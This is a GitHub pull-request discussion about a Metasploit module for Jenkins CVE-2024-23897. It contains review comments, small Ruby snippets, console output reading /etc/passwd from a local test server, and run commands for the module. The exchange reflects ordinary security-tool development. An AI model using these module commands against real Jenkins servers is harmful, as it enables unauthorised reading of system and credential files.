initial POC for jenkins CVE-2024-23897 (unauth arbitrary file read) #18764
Conversation
```ruby
},
'DefaultOptions' => {
  'RPORT' => 8080,
  'HttpClientTimeout' => 3 # very quick response, so set this low
```
The responses normally do return quickly, is it necessary to adjust the timeout? Seems like it'd be necessary if HTTP requests were often timing out during the course of exploitation.
When I was still learning the protocol, any error would cause a crash server side and no response would be received. While I believe I've stabilized out the code to not crash the server, it felt like a good thing to keep in just in case there's a gotcha
@msjenkins-r7 test this please
Nice one @h00die!! A couple minor comments after doing some testing but overall looks great.
Testing with the suggested changes on LTS Version 2.426.2:
```
msf6 auxiliary(gather/jenkins_cli_ampersand_arbitrary_file_read) > options

Module options (auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE_PATH  /etc/passwd      yes       File path to read from the server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path for Jenkins
   VHOST                       no        HTTP server virtual host

View the full module info with the info, or info -d command.

msf6 auxiliary(gather/jenkins_cli_ampersand_arbitrary_file_read) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Found exploitable version: 2.426.2
[*] Sending requests with UUID: da8d3337-2414-43ad-92ab-8cacb7900cdf
[+] /etc/passwd file contents retrieved (first line or 2):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[+] Results saved to: /Users/jheysel/.msf4/loot/20240326174542_default_127.0.0.1_jenkins.file_685766.txt
[*] Auxiliary module execution completed
```
My apologies @h00die, my first set of suggestions fixed the module but I didn't realize they were going to break rubocop. This set of suggestions fixes the module while satisfying rubocop rules.

You were correct with your method definitions:

```ruby
def data_generator(pad: false)
```

It's just that when calling a method defined like the above you have to specify the default variable explicitly, like so:

```ruby
data_generator(pad: multi_line_file)
```
Testing with the latest suggestions:
```
msf6 auxiliary(gather/jenkins_cli_ampersand_arbitrary_file_read) > rexploit
[*] Reloading module...
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Found exploitable version: 2.426.2
[*] Sending requests with UUID: 13be74e5-8a16-4431-aa1c-fdb767edc6ff
[+] /etc/passwd file contents retrieved (first line or 2):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[+] Results saved to: /Users/jheysel/.msf4/loot/20240328124555_default_127.0.0.1_jenkins.file_769324.txt
[*] Auxiliary module execution completed
```
31cf0e2
Release Notes

This PR adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3.

Thanks for handling this @jheysel-r7
This PR adds a new module to exploit CVE-2024-23897, an unauth arbitrary (first 2 lines) file read on Jenkins.

All of the python PoCs I reviewed (all linked in module) aren't very good. While they work for `/etc/passwd`, they only pull files w/ multiple lines and only with a file name length of 11 since the string length is hardcoded. I know it's too late, but shoutout to @acammack-r7 back on #13741 (review) for opening my eyes to this kind of thing. This PoC works with files that have 1 line, or multiple lines, adds check and error handling, so I believe it's good to go now.

```
use auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read
set rhost [ip]
run
```
FILE_PATH